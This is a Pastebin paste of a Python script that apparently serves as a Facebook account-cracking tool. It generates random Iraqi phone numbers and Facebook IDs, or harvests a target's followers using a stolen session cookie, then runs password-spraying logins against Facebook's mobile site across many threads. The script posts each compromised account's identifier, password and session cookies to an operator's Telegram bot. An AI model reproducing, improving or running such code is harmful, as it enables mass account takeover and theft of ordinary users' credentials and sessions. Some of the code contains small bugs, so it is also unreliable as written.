Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # 2023 / 8 / 12 OVER
- # by : sofy_akm
- import os,sys,time,random,json,requests,mechanize,re
- from mechanize import Browser
- from user_agent import generate_user_agent
- from requests import post
- from concurrent.futures import ThreadPoolExecutor
- def pr(z):
- for e in z:
- sys.stdout.write(e)
- sys.stdout.flush()
- time.sleep(0.002)
- W = "\033[0m"
- G = '\033[32;1m'
- R = '\033[31;1m'
- Y = '\033[33;1m'
- B = '\033[34;1m'
- P = '\033[35;1m'
- B2 = '\033[36;1m'
- cookie = []
- token = []
- id = []
- id_token = {'id':'', 'token':''}
- lop,ok,ck =0,0,0
- class FB:
- def __init__(sfsf):
- sfsf.logo = (f"""\n\n\n{W} - {R} # {W}Coder: sFsF {R} # {W} -
- - {R}# {W}TeLeGraM: YYYY02 {R} # {W} -
- - {R}# {W} Version: 2.0 {R} # {W} -\n\n""")
- sfsf.start1 = (f"""\n\n {W}[{R} 1{W} ]{W} - random phone number .\n {W}[{R} 2{W} ]{W} - random ID .\n {W}[{R} 3{W} ]{W} - From Friends . \n\n{W}- - - - - - - - - - - - - -""")
- sfsf.passwords = ["11223344","123@123","aassddff","qqwweerr","1q2w3e4r","1234@1234","1234@qwer","10293857@"]
- #
- def loggin(sfsf,ID,p):
- sfsf.session = requests.Session()
- head = {'Host': 'm.facebook.com', 'viewport-width': '980', 'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"', 'sec-ch-ua-mobile': '?1', 'sec-ch-ua-platform':'"Android"', 'sec-ch-prefers-color-scheme': 'light', 'dnt': '1', 'upgrade-insecure-requests': '1', 'user-agent': generate_user_agent(), 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[inserted by cython to avoid comment closer]/[inserted by cython to avoid comment start]*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'document', 'accept-encoding': 'gzip, deflate, br', 'accept-language': 'en-US,en;q=0.9'}
- getlog = sfsf.session.get(f'https://mbasic.facebook.com/login/device-based/password/?uid={ID}&flow=login_no_pin&refsrc=deprecated&_rdr')
- idpass ={"lsd":re.search(f'name="lsd" value="(.*?)"', str(getlog.text)).group(1),"jazoest":re.search(f'name="jazoest" value="(.*?)"', str(getlog.text)).group(1),"uid":ID,"next":"https://mbasic.facebook.com/login/save-device/","flow":"login_no_pin","pass":p,}
- complete = sfsf.session.post(f'https://mbasic.facebook.com/login/device-based/validate-password/?shbl=0',data=idpass,allow_redirects=False,headers=head)
- return sfsf.session
- #
- def cokk(sfsf,cook):
- sfsf.session = requests.Session()
- os.system('clear')
- try:
- get_tok = sfsf.session.get('https://business.facebook.com/business_locations',headers = {"user-agent":generate_user_agent(),"referer": "https://www.facebook.com/","host": "business.facebook.com","origin": "https://business.facebook.com","upgrade-insecure-requests" : "1","accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7","cache-control": "max-age=0","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","content-type":"text/html; charset=utf-8"},cookies = {"cookie":cook})
- tok = re.search("(EAAG\w+)", get_tok.text).group(1)
- coki = {"cookie":cook}
- nama = sfsf.session.get('https://graph.facebook.com/me?fields=name,id&access_token=%s'%(tok),cookies=coki).json()["name"]
- print(G,"\n\n - Cookie correct ")
- token.append(tok)
- cookie.append(coki)
- time.sleep(2)
- return True
- except requests.exceptions.ConnectionError:
- print(R," - Cookie error Try Again ")
- return False
- time.sleep(2)
- except (KeyError,IOError,AttributeError):
- print(R," - Cookie error Try Again . ")
- return False
- rime.sleep(2)
- #
- def generate_num(sfsf):
- return ''.join(random.choices('0123456789', k=8))
- def generate_id(sfsf):
- return "1000"+ ''.join(random.choices('0123456789', k=11))
- def token_id(sfsf):
- os.system("clear")
- pr(sfsf.logo)
- pr(W+'\n\n| Enter'+R+' Token Bot |')
- sfsf.t = input(G+' \n ==> ')
- pr(W+'\n\n| Enter '+R+' ID TeleGram |')
- sfsf.i = input(G+' \n ==> ')
- id_token['id'] = sfsf.i
- id_token['token'] = sfsf.t
- #
- def num(sfsf):
- FB().token_id()
- pr(f'\n\n {R}|{W} Enter password to begin hunt FB account {R} |')
- PSW = input(G+' \n ==> ')
- os.system('clear')
- pr(sfsf.logo)
- print("\n\n\n\n")
- with ThreadPoolExecutor(max_workers=10) as boy:
- while True:
- gen = FB().generate_num()
- cod = "077","078","075"
- c = random.choice(cod)
- if PSW == '':
- ID = "+964"+c+gen
- p = c+gen
- else:
- ID = "+964"+c+gen
- p=PSW
- try:
- boy.submit(FB().brute1,ID,p)
- except:pass
- #
- def id(sfsf):
- FB().token_id()
- pr(f'\n\n {R}|{W} Enter password to begin hunt FB account {R} |')
- PSW = input(G+' \n ==> ')
- os.system('clear')
- pr(sfsf.logo)
- print("\n\n\n\n")
- with ThreadPoolExecutor(max_workers=10) as boy:
- while True:
- ID = FB().generate_id()
- if PSW == '':
- try:
- for p in sfsf.passwords:
- boy.submit(FB().brute1,ID,p)
- except:pass
- else:
- p = PSW
- try:
- boy.submit(FB().brute1,ID,p)
- except:pass
- #
- def brute1(sfsf,ID,pwx):
- global ok,ck,lop
- lop+=1
- sys.stdout.write(f"\r {R} - {W} {lop} {R}|{G} Haked : {ok}{R} | {Y} Secure : {ck} {R} - ");sys.stdout.flush()
- try:
- if True:
- result = FB().loggin(ID,pwx)
- if "c_user" in result.cookies.get_dict():
- koki = (";").join([ "%s=%s" % (key, value) for key, value in result.cookies.get_dict().items() ])
- koki+=' m_pixel_ratio=2.625; wd=412x756'
- print(koki)
- ok+=1
- requests.post(f"https://api.telegram.org/bot{id_token['token']}/sendMessage?chat_id={id_token['id']}&text=تم صيد حساب فيسبوك شـغـال ✅\n- - - - - - - - - - - - - - - - - - - - - - -\n \n\n✦𝐄𝐦𝐚𝐢𝐥 : {ID}\n✦ 𝐏𝐚𝐬𝐬 : {pwx}\n\n✦ cookies : {koki} \n\n - - - - - - - - - - - - - - - " )
- elif "checkpoint" in result.cookies.get_dict():
- ck+=1
- requests.post(f"https://api.telegram.org/bot{id_token['token']}/sendMessage?chat_id={id_token['id']}&text=تم صيد حساب فيسبوك سكيـور ✅\n- - - - - - - - - - - - - - - - - - - - - - -\n \n\n✦𝐄𝐦𝐚𝐢𝐥 : {ID}\n✦ 𝐏𝐚𝐬𝐬 : {pwx}\n\n✦ cookies : {koki} \n\n - - - - - - - - - - - - - - - " )
- else:
- pass
- except requests.exceptions.ConnectionError:
- time.sleep(3)
- brute1(ID,pwx)
- #
- def target(sfsf,user,token,cookie):
- try:
- x = requests.get(f'https://graph.facebook.com/'+user+'?fields=subscribers.limit(50000)&access_token='+token,cookies={"cookies":str(cookie)}).json()
- for z in x['subscribers']['data']:
- try:id.append(z['id']+':'+z['name'])
- except:continue
- return True
- except:
- return False
- #
- def sub(sfsf,t,c):
- os.system("clear")
- pr(sfsf.logo)
- tr = input(G+'\n\n - ID Target : ')
- if FB().target(tr,t[0],c[0]):
- if len(id)== 0:
- pr(f'\n\n{W} ~ {W}chose another {R}ID {W}Target ...')
- time.sleep(1.5)
- FB().sub(t,c)
- else:
- pass
- pass
- else:
- pr(f'\n\n{W} ~ {W}chose another {R}ID {W}Target ...')
- time.sleep(1.5)
- FB().sub(t,c)
- i = len(id)
- pr(f"\n\n {G} √ Total Ids : {R} {i}")
- time.sleep(2)
- FB().token_id()
- pr(f'\n\n {R}|{W} Enter password to begin hunt FB account {R} |\n\n- {W} You Can Skip This Step By Enter ⏩')
- PSW = input(R+' \n ==> ')
- os.system("clear")
- print(sfsf.logo)
- print("\n\n")
- if PSW == "":
- with ThreadPoolExecutor(max_workers=20) as boy:
- for user in id:
- try:
- uid,name = user.split(":")
- mocii = name.split(" ")
- if len(mocii) == 1:
- pwx = [name, mocii[0]+"123",mocii[0]+"12345"]
- for p in sfsf.passwords:
- pwx.append(p)
- elif len(mocii) == 2:
- pwx = [name, mocii[0]+"123",mocii[0]+"12345",mocii[:2]+"123"]
- for p in sfsf.passwords:
- pwx.append(p)
- elif len(mocii) == 3:
- pwx = [name, mocii[0]+"123",mocii[0]+"12345",mocii[:2]+"123"]
- for p in sfsf.passwords:
- pwx.append(p)
- else:
- pwx = [name]
- for p in sfsf.passwords:
- pwx.append(p)
- clas = FB()
- boy.submit(clas.brute2,uid,pwx)
- except:pass
- exit("\n END ")
- else:
- with ThreadPoolExecutor(max_workers=10) as boy:
- for user in id:
- try:
- uid,name = user.split(":")
- clas = FB()
- boy.submit(clas.brute2,uid,PSW)
- except:pass
- exit("\n END")
- def brute2(sfsf,ID,pwx):
- global ok,ck,lop
- lop+=1
- sys.stdout.write(f"\r {W} -{R} {len(id)}{R} |{W} {lop} {R}|{G} Haked : {ok}{R} | {Y} Secure : {ck} {W} - ");sys.stdout.flush()
- try:
- for xx in pwx:
- PS = xx.lower()
- result = FB().loggin(ID,PS)
- if "c_user" in result.cookies.get_dict():
- koki = (";").join([ "%s=%s" % (key, value) for key, value in result.cookies.get_dict().items() ])
- koki+=' m_pixel_ratio=2.625; wd=412x756'
- ok+=1
- requests.post(f"https://api.telegram.org/bot{id_token['token']}/sendMessage?chat_id={id_token['id']}&text=تم صيد حساب فيسبوك شـغـال ✅\n- - - - - - - - - - - - - - - - - - - - - - -\n \n✦𝐄𝐦𝐚𝐢𝐥 : {ID}\n✦ 𝐏𝐚𝐬𝐬 : {PS}\n✦ cookies : {koki}\n\n - - - - - - - - - - - - - - - - " )
- elif "checkpoint" in result.cookies.get_dict():
- ck+=1
- requests.post(f"https://api.telegram.org/bot{id_token['token']}/sendMessage?chat_id={id_token['id']}&text=تم صيد حساب فيسبوك سكيور ✅\n- - - - - - - - - - - - - - - - - - - - - - -\n \n✦𝐄𝐦𝐚𝐢𝐥 : {ID}\n✦ 𝐏𝐚𝐬𝐬 : {PS}\n\n - - - - - - - - - - - - - - - - " )
- else:
- pass
- except requests.exceptions.ConnectionError:
- time.sleep(3)
- brute2(ID,pwx)
- #
- def choice(sfsf):
- os.system('clear')
- pr(sfsf.logo)
- pr(sfsf.start1)
- ch = input(f"\n\n{R}- {W}choice : ")
- if ch == "1":
- FB().num()
- elif ch == "2":
- FB().id()
- elif ch == '3':
- os.system('clear')
- pr(sfsf.logo)
- sfsf.cookies= input(f"\n{G} - {W}Enter CooKies :{G} ")
- if FB().cokk(sfsf.cookies):
- t = token
- c = cookie
- FB().sub(t,c)
- else:
- pr(f'\n\n{W}~ {R}CooKies Failed ...')
- time.sleep(2)
- FB().choice()
- else:
- FB().choice()
- FB().choice()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement